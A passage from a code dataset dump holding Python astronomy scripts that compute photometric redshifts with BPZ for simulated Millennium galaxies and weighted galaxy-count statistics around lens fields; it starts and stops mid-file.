range(int(str(sys.argv[4]))):\n g.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (q_gal[i][j][k], q_oneoverr[i][j][k], q_zweight[i][j][k], q_mass[i][j][k], q_mass2[i][j][k], q_mass2rms[i][j][k], q_mass3[i][j][k], q_mass3rms[i][j][k], q_zoverr[i][j][k], q_massoverr[i][j][k], q_mass2overr[i][j][k], q_mass3overr[i][j][k], q_mass2overrrms[i][j][k], q_mass3overrrms[i][j][k], q_zmassoverr[i][j][k], q_zmass2overr[i][j][k]))\n for k in range(int(str(sys.argv[4]))):\n h.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (tab_q_gal[i][j][k], tab_q_oneoverr[i][j][k], tab_q_zweight[i][j][k], tab_q_mass[i][j][k], tab_q_mass2[i][j][k], tab_q_mass2rms[i][j][k], tab_q_mass3[i][j][k], tab_q_mass3rms[i][j][k], tab_q_zoverr[i][j][k], tab_q_massoverr[i][j][k], tab_q_mass2overr[i][j][k], tab_q_mass3overr[i][j][k], tab_q_mass2overrrms[i][j][k], tab_q_mass3overrrms[i][j][k], tab_q_zmassoverr[i][j][k], tab_q_zmass2overr[i][j][k]))\n f.close()\n #if str(sys.argv[8]) == \"samp\":\n g.close()\n #if str(sys.argv[8]) == \"tab\":\n h.close()\n\n f = open('%s/%s_%s_q75_orig_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"samp\":\n g = open('%s/%s_%s_q75_samp_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"tab\":\n h = open('%s/%s_%s_q75_tab_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n if maskedcell[i][j] >= 0.75:\n f.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (origq_gal[i][j], origq_oneoverr[i][j], origq_zweight[i][j], origq_mass[i][j], origq_mass2[i][j], origq_mass2rms[i][j], origq_mass3[i][j], origq_mass3rms[i][j], origq_zoverr[i][j], origq_massoverr[i][j], origq_mass2overr[i][j], origq_mass3overr[i][j], origq_mass2overrrms[i][j], origq_mass3overrrms[i][j], origq_zmassoverr[i][j], origq_zmass2overr[i][j]))\n for k in range(int(str(sys.argv[4]))):\n g.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (q_gal[i][j][k], q_oneoverr[i][j][k], q_zweight[i][j][k], q_mass[i][j][k], q_mass2[i][j][k], q_mass2rms[i][j][k], q_mass3[i][j][k], q_mass3rms[i][j][k], q_zoverr[i][j][k], q_massoverr[i][j][k], q_mass2overr[i][j][k], q_mass3overr[i][j][k], q_mass2overrrms[i][j][k], q_mass3overrrms[i][j][k], q_zmassoverr[i][j][k], q_zmass2overr[i][j][k]))\n for k in range(int(str(sys.argv[4]))):\n h.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (tab_q_gal[i][j][k], tab_q_oneoverr[i][j][k], tab_q_zweight[i][j][k], tab_q_mass[i][j][k], tab_q_mass2[i][j][k], tab_q_mass2rms[i][j][k], tab_q_mass3[i][j][k], tab_q_mass3rms[i][j][k], tab_q_zoverr[i][j][k], tab_q_massoverr[i][j][k], tab_q_mass2overr[i][j][k], tab_q_mass3overr[i][j][k], tab_q_mass2overrrms[i][j][k], tab_q_mass3overrrms[i][j][k], tab_q_zmassoverr[i][j][k], tab_q_zmass2overr[i][j][k]))\n\n f.close()\n #mstarcat_lens.close()\n #if str(sys.argv[8]) == \"samp\":\n g.close()\n #if str(sys.argv[8]) == \"tab\":\n h.close()\n\n print(\"Total time for subfield: --- %s seconds ---\" % (time.time() - start_timesubfield))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.4762692451477051, "alphanum_fraction": 0.5246829986572266, "avg_line_length": 57.5102653503418, "blob_id": "49655c8028c09a66a97d3e156dbfd1bb7cb37689", "content_id": "2219a592fd044048bc4d3adf07658a469fcf3bb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19953, "license_type": "no_license", "max_line_length": 563, "num_lines": 341, "path": "/python/catalogue_utilities/OLDphotozMillenium.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# run from the bpz/test folder as: python /Users/perseus/Dropbox/Davis_work/code/photozMillenium.py #complete address to the simulation field number\n# where the address is, e.g. /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_6_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.images.txt, and number is an integer, corresponding to the order number of each run of this code. Run the code from inside bpz/test\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_timefield = time.time()\n\nbpznr=1000 # how many objects should bpz be run with\nu_millenium=np.zeros(bpznr)\nuerr_millenium=np.zeros(bpznr)\ng_millenium=np.zeros(bpznr)\ngerr_millenium=np.zeros(bpznr)\nr_millenium=np.zeros(bpznr)\nrerr_millenium=np.zeros(bpznr)\ni_millenium=np.zeros(bpznr)\nierr_millenium=np.zeros(bpznr)\nz_millenium=np.zeros(bpznr)\nzerr_millenium=np.zeros(bpznr)\nJ_millenium=np.zeros(bpznr)\nJerr_millenium=np.zeros(bpznr)\nH_millenium=np.zeros(bpznr)\nHerr_millenium=np.zeros(bpznr)\nK_millenium=np.zeros(bpznr)\nKerr_millenium=np.zeros(bpznr)\nid=np.zeros(bpznr)\npofz=np.zeros((bpznr,70))\nmstar=np.zeros(bpznr)\nposx=np.zeros(bpznr)\nposy=np.zeros(bpznr)\nz_best=np.zeros(bpznr)\nz_spec=np.zeros(bpznr)\n#z=np.linspace(0.05,3.5,70)\nos.system(\"cp millenium.columns millenium_%s.columns\" % str(sys.argv[2]))\nname_in=\"/Users/perseus/bpz-1.99.3/test/millenium_%s.cat\" % str(sys.argv[2])\nname_outzbest=\"/Users/perseus/bpz-1.99.3/test/millenium_%s_bpz.cat\" % str(sys.argv[2])\nname_outpdz=\"/Users/perseus/bpz-1.99.3/test/millenium_%s.probs\" % str(sys.argv[2])\nname_out=\"%s.pdz\" % (str(sys.argv[1])[0:len(str(sys.argv[1]))-11])\nos.system(\"rm %s\" % name_out) # since the code only appends, if we have an incomplete previous output we should remove it\nitrue=0 # index of only the objects passing the selection criteria, between 0 and bpznr-1\nwith open(str(sys.argv[1])) as fields:\n for gal in fields:\n if gal!=\"\\n\": # careful to include this, otherwise the objects at the end of file fail to be included\n if gal.split()[0]!=\"GalID\":\n if itrue==bpznr:\n itrue=0\n bpz_in = open(name_in,'w')\n bpz_in.write(\"#ID u u_err g g_err r r_err i i_err z z_err J J_err H H_err K K_err \\n\")\n for i in range(bpznr):\n bpz_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\\n' % (i+1,u_millenium[i],uerr_millenium[i],g_millenium[i],gerr_millenium[i],r_millenium[i],rerr_millenium[i],i_millenium[i],ierr_millenium[i],z_millenium[i],zerr_millenium[i],J_millenium[i],Jerr_millenium[i],H_millenium[i],Herr_millenium[i],K_millenium[i],Kerr_millenium[i]))\n bpz_in.close()\n os.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % name_in)\n os.system(\"python $BPZPATH/bpzfinalize.py %s\" % name_in[0:len(name_in)-4])\n l=0\n with open('%s' % name_outzbest) as bpz_outzbest:\n for outzbest in bpz_outzbest:\n if (outzbest.split()[0]!=\"#\") and (outzbest.split()[0]!=\"#id\"):\n #print outzbest.split()[0], \"\\n\"\n z_best[l]=outzbest.split()[1]\n l=l+1\n l=0\n with open('%s' % name_outpdz) as bpz_outpdz:\n for outpdz in bpz_outpdz:\n if outpdz.split()[0]!=\"#\":\n for i in range(70):\n pofz[l][i]=float(outpdz.split()[1+i])\n l=l+1\n outfile=open(name_out,'a')\n output=\"\"\n for i in range(bpznr):\n strid=\"%15d\" % id[i]\n output=output+strid+\"\\t\"+str(mstar[i])+\"\\t\"+str(z_spec[i])+\"\\t\"+str(z_best[i])+\"\\t\"+str(posx[i])+\"\\t\"+str(posy[i])+\"\\t\"+str(u_millenium[i])+\"\\t\"+str(uerr_millenium[i])+\"\\t\"+str(g_millenium[i])+\"\\t\"+str(gerr_millenium[i])+\"\\t\"+str(r_millenium[i])+\"\\t\"+str(rerr_millenium[i])+\"\\t\"+str(i_millenium[i])+\"\\t\"+str(ierr_millenium[i])+\"\\t\"+str(z_millenium[i])+\"\\t\"+str(zerr_millenium[i])+\"\\t\"+str(J_millenium[i])+\"\\t\"+str(Jerr_millenium[i])+\"\\t\"+str(H_millenium[i])+\"\\t\"+str(Herr_millenium[i])+\"\\t\"+str(K_millenium[i])+\"\\t\"+str(Kerr_millenium[i])+\"\\t\"\n for j in range(70):\n output=output+str(pofz[i][j])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n #print gal.split()[15], \"\\n\"\n if float(gal.split()[15]) <= 24: # if mag_i < 24\n id[itrue]=float(gal.split()[0])\n mstar[itrue]=float(gal.split()[11])\n z_spec[itrue]=float(gal.split()[5])\n posx[itrue]=float(gal.split()[6])\n posy[itrue]=float(gal.split()[7])\n u_millenium[itrue]=float(gal.split()[12])\n if u_millenium[itrue] < 23:\n uerr_millenium[itrue]=0.01\n if (u_millenium[itrue] < 24) and (u_millenium[itrue] > 23):\n uerr_millenium[itrue]=0.02\n if (u_millenium[itrue] < 24.5) and (u_millenium[itrue] > 24):\n uerr_millenium[itrue]=0.03\n if (u_millenium[itrue] < 24.7) and (u_millenium[itrue] > 24.5):\n uerr_millenium[itrue]=0.04\n if (u_millenium[itrue] < 24.9) and (u_millenium[itrue] > 24.7):\n uerr_millenium[itrue]=0.05\n if (u_millenium[itrue] < 25.1) and (u_millenium[itrue] > 24.9):\n uerr_millenium[itrue]=0.06\n if (u_millenium[itrue] < 25.2) and (u_millenium[itrue] > 25.1):\n uerr_millenium[itrue]=0.07\n if (u_millenium[itrue] < 25.3) and (u_millenium[itrue] > 25.2):\n uerr_millenium[itrue]=0.08\n if (u_millenium[itrue] < 25.4) and (u_millenium[itrue] > 25.3):\n uerr_millenium[itrue]=0.09\n if (u_millenium[itrue] < 25.5) and (u_millenium[itrue] > 25.4):\n uerr_millenium[itrue]=0.10\n if (u_millenium[itrue] < 26) and (u_millenium[itrue] > 25.5):\n uerr_millenium[itrue]=0.13\n if (u_millenium[itrue] < 26.5) and (u_millenium[itrue] > 26):\n uerr_millenium[itrue]=0.18\n if (u_millenium[itrue] < 27) and (u_millenium[itrue] > 26.5):\n uerr_millenium[itrue]=0.25\n if u_millenium[itrue] > 24:\n uerr_millenium[itrue]=0.30\n g_millenium[itrue]=float(gal.split()[13])\n if g_millenium[itrue] < 24:\n gerr_millenium[itrue]=0.01\n if (g_millenium[itrue] < 24.5) and (g_millenium[itrue] > 24):\n gerr_millenium[itrue]=0.02\n if (g_millenium[itrue] < 24.8) and (g_millenium[itrue] > 24.5):\n gerr_millenium[itrue]=0.03\n if (g_millenium[itrue] < 25) and (g_millenium[itrue] > 24.8):\n gerr_millenium[itrue]=0.04\n if (g_millenium[itrue] < 25.3) and (g_millenium[itrue] > 25):\n gerr_millenium[itrue]=0.05\n if (g_millenium[itrue] < 25.5) and (g_millenium[itrue] > 25.3):\n gerr_millenium[itrue]=0.06\n if (g_millenium[itrue] < 25.7) and (g_millenium[itrue] > 25.5):\n gerr_millenium[itrue]=0.07\n if (g_millenium[itrue] < 25.8) and (g_millenium[itrue] > 25.7):\n gerr_millenium[itrue]=0.08\n if (g_millenium[itrue] < 26) and (g_millenium[itrue] > 25.8):\n gerr_millenium[itrue]=0.09\n if (g_millenium[itrue] < 26.2) and (g_millenium[itrue] > 26):\n gerr_millenium[itrue]=0.10\n if (g_millenium[itrue] < 26.5) and (g_millenium[itrue] > 26.2):\n gerr_millenium[itrue]=0.13\n if (g_millenium[itrue] < 27) and (g_millenium[itrue] > 26.5):\n gerr_millenium[itrue]=0.18\n if g_millenium[itrue] > 27:\n gerr_millenium[itrue]=0.18\n r_millenium[itrue]=float(gal.split()[14])\n if r_millenium[itrue] < 23.2:\n rerr_millenium[itrue]=0.01\n if (r_millenium[itrue] < 24.1) and (r_millenium[itrue] > 23.2):\n rerr_millenium[itrue]=0.02\n if (r_millenium[itrue] < 24.5) and (r_millenium[itrue] > 24.1):\n rerr_millenium[itrue]=0.03\n if (r_millenium[itrue] < 24.9) and (r_millenium[itrue] > 24.5):\n rerr_millenium[itrue]=0.04\n if (r_millenium[itrue] < 25.0) and (r_millenium[itrue] > 24.9):\n rerr_millenium[itrue]=0.05\n if (r_millenium[itrue] < 25.2) and (r_millenium[itrue] > 25.0):\n rerr_millenium[itrue]=0.06\n if (r_millenium[itrue] < 25.3) and (r_millenium[itrue] > 25.2):\n rerr_millenium[itrue]=0.07\n if (r_millenium[itrue] < 25.5) and (r_millenium[itrue] > 25.3):\n rerr_millenium[itrue]=0.08\n if (r_millenium[itrue] < 25.6) and (r_millenium[itrue] > 25.5):\n rerr_millenium[itrue]=0.09\n if (r_millenium[itrue] < 25.7) and (r_millenium[itrue] > 25.6):\n rerr_millenium[itrue]=0.10\n if (r_millenium[itrue] < 26.0) and (r_millenium[itrue] > 25.7):\n rerr_millenium[itrue]=0.12\n if r_millenium[itrue] > 26:\n rerr_millenium[itrue]=0.12\n i_millenium[itrue]=float(gal.split()[15])\n if i_millenium[itrue] < 22.8:\n ierr_millenium[itrue]=0.01\n if (i_millenium[itrue] < 23.6) and (i_millenium[itrue] > 22.8):\n ierr_millenium[itrue]=0.02\n if (i_millenium[itrue] < 24.0) and (i_millenium[itrue] > 23.6):\n ierr_millenium[itrue]=0.03\n if (i_millenium[itrue] < 24.2) and (i_millenium[itrue] > 24.0):\n ierr_millenium[itrue]=0.04\n if (i_millenium[itrue] < 24.4) and (i_millenium[itrue] > 24.2):\n ierr_millenium[itrue]=0.05\n if (i_millenium[itrue] < 24.6) and (i_millenium[itrue] > 24.4):\n ierr_millenium[itrue]=0.06\n if (i_millenium[itrue] < 24.7) and (i_millenium[itrue] > 24.6):\n ierr_millenium[itrue]=0.07\n if (i_millenium[itrue] < 24.8) and (i_millenium[itrue] > 24.7):\n ierr_millenium[itrue]=0.08\n if (i_millenium[itrue] < 24.9) and (i_millenium[itrue] > 24.8):\n ierr_millenium[itrue]=0.09\n if (i_millenium[itrue] < 25.0) and (i_millenium[itrue] > 24.9):\n ierr_millenium[itrue]=0.10\n if (i_millenium[itrue] < 25.2) and (i_millenium[itrue] > 25.0):\n ierr_millenium[itrue]=0.11\n if i_millenium[itrue] > 25.2:\n ierr_millenium[itrue]=0.11\n z_millenium[itrue]=float(gal.split()[16])\n if z_millenium[itrue] < 22.0:\n zerr_millenium[itrue]=0.01\n if (z_millenium[itrue] < 22.8) and (z_millenium[itrue] > 22.0):\n zerr_millenium[itrue]=0.02\n if (z_millenium[itrue] < 23.2) and (z_millenium[itrue] > 22.8):\n zerr_millenium[itrue]=0.03\n if (z_millenium[itrue] < 24.2) and (z_millenium[itrue] > 23.2):\n zerr_millenium[itrue]=0.04\n if (z_millenium[itrue] < 24.4) and (z_millenium[itrue] > 24.2):\n zerr_millenium[itrue]=0.05\n if (z_millenium[itrue] < 24.6) and (z_millenium[itrue] > 24.4):\n zerr_millenium[itrue]=0.06\n if (z_millenium[itrue] < 24.7) and (z_millenium[itrue] > 24.6):\n zerr_millenium[itrue]=0.07\n if (z_millenium[itrue] < 24.8) and (z_millenium[itrue] > 24.7):\n zerr_millenium[itrue]=0.08\n if (z_millenium[itrue] < 24.9) and (z_millenium[itrue] > 24.8):\n zerr_millenium[itrue]=0.09\n if (z_millenium[itrue] < 25.0) and (z_millenium[itrue] > 24.9):\n zerr_millenium[itrue]=0.10\n if (z_millenium[itrue] < 25.2) and (z_millenium[itrue] > 25.0):\n zerr_millenium[itrue]=0.11\n if z_millenium[itrue] > 25.2:\n zerr_millenium[itrue]=0.11\n J_millenium[itrue]=float(gal.split()[17])\n if J_millenium[itrue] < 20.5:\n Jerr_millenium[itrue]=0.01\n if (J_millenium[itrue] < 21.2) and (J_millenium[itrue] > 20.5):\n Jerr_millenium[itrue]=0.02\n if (J_millenium[itrue] < 22.0) and (J_millenium[itrue] > 21.2):\n Jerr_millenium[itrue]=0.03\n if (J_millenium[itrue] < 22.4) and (J_millenium[itrue] > 22.0):\n Jerr_millenium[itrue]=0.04\n if (J_millenium[itrue] < 22.6) and (J_millenium[itrue] > 22.4):\n Jerr_millenium[itrue]=0.05\n if (J_millenium[itrue] < 22.8) and (J_millenium[itrue] > 22.6):\n Jerr_millenium[itrue]=0.06\n if (J_millenium[itrue] < 22.9) and (J_millenium[itrue] > 22.8):\n Jerr_millenium[itrue]=0.07\n if (J_millenium[itrue] < 23.1) and (J_millenium[itrue] > 22.9):\n Jerr_millenium[itrue]=0.08\n if (J_millenium[itrue] < 23.2) and (J_millenium[itrue] > 23.1):\n Jerr_millenium[itrue]=0.09\n if (J_millenium[itrue] < 23.4) and (J_millenium[itrue] > 23.2):\n Jerr_millenium[itrue]=0.10\n if (J_millenium[itrue] < 23.7) and (J_millenium[itrue] > 23.4):\n Jerr_millenium[itrue]=0.15\n if (J_millenium[itrue] < 24.0) and (J_millenium[itrue] > 23.7):\n Jerr_millenium[itrue]=0.18\n if J_millenium[itrue] > 24.0:\n Jerr_millenium[itrue]=0.18\n H_millenium[itrue]=float(gal.split()[18]) # I don't have H data yet so I use an average between J and K\n if H_millenium[itrue] < 21.9:\n Herr_millenium[itrue]=0.01\n if (H_millenium[itrue] < 22.6) and (H_millenium[itrue] > 21.9):\n Herr_millenium[itrue]=0.02\n if (H_millenium[itrue] < 22.9) and (H_millenium[itrue] > 22.6):\n Herr_millenium[itrue]=0.03\n if (H_millenium[itrue] < 23.1) and (H_millenium[itrue] > 22.9):\n Herr_millenium[itrue]=0.04\n if (H_millenium[itrue] < 23.3) and (H_millenium[itrue] > 23.1):\n Herr_millenium[itrue]=0.05\n if (H_millenium[itrue] < 23.4) and (H_millenium[itrue] > 23.3):\n Herr_millenium[itrue]=0.06\n if (H_millenium[itrue] < 23.6) and (H_millenium[itrue] > 23.4):\n Herr_millenium[itrue]=0.07\n if (H_millenium[itrue] < 23.8) and (H_millenium[itrue] > 23.6):\n Herr_millenium[itrue]=0.08\n if (H_millenium[itrue] < 24.0) and (H_millenium[itrue] > 23.8):\n Herr_millenium[itrue]=0.09\n if (H_millenium[itrue] < 24.1) and (H_millenium[itrue] > 24.0):\n Herr_millenium[itrue]=0.10\n if (H_millenium[itrue] < 24.5) and (H_millenium[itrue] > 24.1):\n Herr_millenium[itrue]=0.15\n if H_millenium[itrue] > 24.5:\n Herr_millenium[itrue]=0.15\n K_millenium[itrue]=float(gal.split()[19])\n if K_millenium[itrue] < 22.0:\n Kerr_millenium[itrue]=0.01\n if (K_millenium[itrue] < 22.8) and (K_millenium[itrue] > 22.0):\n Kerr_millenium[itrue]=0.02\n if (K_millenium[itrue] < 23.3) and (K_millenium[itrue] > 22.8):\n Kerr_millenium[itrue]=0.03\n if (K_millenium[itrue] < 23.5) and (K_millenium[itrue] > 23.3):\n Kerr_millenium[itrue]=0.04\n if (K_millenium[itrue] < 23.7) and (K_millenium[itrue] > 23.5):\n Kerr_millenium[itrue]=0.05\n if (K_millenium[itrue] < 23.9) and (K_millenium[itrue] > 23.7):\n Kerr_millenium[itrue]=0.06\n if (K_millenium[itrue] < 24.2) and (K_millenium[itrue] > 23.9):\n Kerr_millenium[itrue]=0.07\n if (K_millenium[itrue] < 24.4) and (K_millenium[itrue] > 24.2):\n Kerr_millenium[itrue]=0.08\n if (K_millenium[itrue] < 24.5) and (K_millenium[itrue] > 24.4):\n Kerr_millenium[itrue]=0.09\n if (K_millenium[itrue] < 24.6) and (K_millenium[itrue] > 24.5):\n Kerr_millenium[itrue]=0.10\n if (K_millenium[itrue] < 25.0) and (K_millenium[itrue] > 24.6):\n Kerr_millenium[itrue]=0.15\n if K_millenium[itrue] > 24.0:\n Kerr_millenium[itrue]=0.15\n itrue=itrue+1\n\n #the code below is necessary to deal with the objects at the end of the file, if there are less than bpznr objects left\nbpz_in = open(name_in,'w')\nbpz_in.write(\"#ID u u_err g g_err r r_err i i_err z z_err J J_err H H_err K K_err \\n\")\nfor i in range(itrue):\n bpz_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\\n' % (i+1,u_millenium[i],uerr_millenium[i],g_millenium[i],gerr_millenium[i],r_millenium[i],rerr_millenium[i],i_millenium[i],ierr_millenium[i],z_millenium[i],zerr_millenium[i],J_millenium[i],Jerr_millenium[i],H_millenium[i],Herr_millenium[i],K_millenium[i],Kerr_millenium[i]))\nbpz_in.close()\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % name_in)\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % name_in[0:len(name_in)-4])\nl=0\nwith open('%s' % name_outzbest) as bpz_outzbest:\n for outzbest in bpz_outzbest:\n if (outzbest.split()[0]!=\"#\") and (outzbest.split()[0]!=\"#id\"):\n z_best[l]=outzbest.split()[1]\n l=l+1\nl=0\nwith open('%s' % name_outpdz) as bpz_outpdz:\n for outpdz in bpz_outpdz:\n if outpdz.split()[0]!=\"#\":\n for i in range(70):\n pofz[l][i]=float(outpdz.split()[1+i])\n l=l+1\noutfile=open(name_out,'a')\noutput=\"\"\nfor i in range(itrue):\n output=output+str(id[i])+\"\\t\"+str(mstar[i])+\"\\t\"+str(z_spec[i])+\"\\t\"+str(z_best[i])+\"\\t\"+str(posx[i])+\"\\t\"+str(posy[i])+\"\\t\"+str(u_millenium[i])+\"\\t\"+str(uerr_millenium[i])+\"\\t\"+str(g_millenium[i])+\"\\t\"+str(gerr_millenium[i])+\"\\t\"+str(r_millenium[i])+\"\\t\"+str(rerr_millenium[i])+\"\\t\"+str(i_millenium[i])+\"\\t\"+str(ierr_millenium[i])+\"\\t\"+str(z_millenium[i])+\"\\t\"+str(zerr_millenium[i])+\"\\t\"+str(J_millenium[i])+\"\\t\"+str(Jerr_millenium[i])+\"\\t\"+str(H_millenium[i])+\"\\t\"+str(Herr_millenium[i])+\"\\t\"+str(K_millenium[i])+\"\\t\"+str(Kerr_millenium[i])+\"\\t\"\n for j in range(70):\n output=output+str(pofz[i][j])+\"\\t\"\n output=output+\"\\n\"\noutfile.write(output)\noutfile.close()\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.4910215139389038, "alphanum_fraction": 0.5797118544578552, "avg_line_length": 85.65897369384766, "blob_id": "1fe61ddaa607777a0b6c9b6ba48756b5c8a3ca84", "content_id": "149b949e23cd7f3223ef30db6ad3984c14d2017c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33803, "license_type": "no_license", "max_line_length": 936, "num_lines": 390, "path": "/python/weightingsims.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#B1608_sims Millenium\n# 25 subsims of 1degx1deg, to emulate CFHTLENS W4\n# cells: 4x4arcmin covering each subsim, in a grid\n# run as: python weightingsims.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_6_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs.cat samplesize# radius maglimit\n# where samplesize number is 0, 100 or 1000 and msk_lenssize is 45, 60, 90 or 120; maglimit is 23 23.5 or 24;\n#since the weights depend on z_s, I will not run 4 times but instead in the output file output for all 4 redshifts in different columns\n\nimport numpy as np\nimport scipy\nimport sys\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_time = time.time()\n\nprint(\"Arguments: Catalogue name: %s \\n Number of samples to be drawn from P(z) and P(Mstar): %s \\n Radius of each cell: %s \\n Limiting magnitude: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4])))\n\ndeginrad=0.0174532925\nzgrid=np.linspace(0.05,3.5,70)\nzgridint = np.arange(70) # because stats.rv_discrete only works with integer points\nz_s_B1608 = 1.39\nz_s_HE0435 = 1.69\nz_s_HE1104 = 2.32\nz_s_RX1131 = 0.66\n\nlimitx,limity = np.loadtxt(sys.argv[1], usecols=[4,5], unpack=True)\ncells_on_a_side = [int((round(np.max(limitx/deginrad)-round(np.min(limitx/deginrad))))*3600/240),int((round(np.max(limity/deginrad)-round(np.min(limity/deginrad))))*3600/240)]\nprint \"Position limits:\", round(np.min(limitx/deginrad)),round(np.max(limitx/deginrad)),round(np.min(limity/deginrad)),round(np.max(limity/deginrad))\ncentersx=np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\ncentersy=np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nminx=round(np.min(limitx/deginrad))\nminy=round(np.min(limity/deginrad))\nfor i in range(cells_on_a_side[0]):\n for j in range(cells_on_a_side[1]):\n centersx[i][j]=minx * deginrad + i * deginrad/cells_on_a_side[0] + deginrad/cells_on_a_side[0]/2\n centersy[i][j]=miny * deginrad + j * deginrad/cells_on_a_side[1] + deginrad/cells_on_a_side[1]/2\n#print centersx,centersy\nB1608_specsim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_specsim_zmass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_gal = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_oneoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zweight = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass2 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass3 = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_massoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass2overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_mass3overr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zmassoverr = np.zeros((cells_on_a_side[0],cells_on_a_side[1]))\nB1608_origsim_zmass2overr = 